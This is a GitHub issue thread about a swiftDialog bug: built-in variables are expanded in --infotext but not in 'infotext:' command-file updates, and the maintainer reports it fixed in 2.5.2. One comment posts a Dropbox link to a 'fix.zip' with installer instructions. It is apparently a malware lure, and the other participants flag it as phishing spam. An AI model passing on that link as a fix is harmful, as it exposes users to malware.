### ISSUE TITLE
Bug: built-in variables can be used in --infotext but not infotext:

### ISSUE THREAD

**Issue by wakco** [swiftDialog/swiftDialog#426]
When attempting to have an infotext line that gets updated periodically, I found the built-in variables couldn't be given in the command file. This is easy to reproduce, create a dialog with an `--infotext` and command file, and attempt to update it with `infotext:` containing built-in variables.

What I get in swiftDialog 2.5.1 is the built-in variable values show correctly to start with (from the `--infotext` option), but when updating with `infotext:`, the built-in variable names show instead of the their values.

Essentially I was trying to show the computers current IP address, and have it update that with the computer name, model, os version, however the update did not go as expected.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wakco** [comment]
Ignoring the I assume phishing spam, is it possible the built-in variables are only available from the command line, not from the command file? Or is it a json support issue?

**Comment by bartreardon** [comment]
Must be getting popular if I'm being target by spam bots.

text processing for built in variables should get performed when using command file but looks like it doesn't. Should be easy to fix up.

**Comment by bartreardon** [comment]
this should be fixed in 2.5.2 - I thought I referenced it in a commit but apparently not.
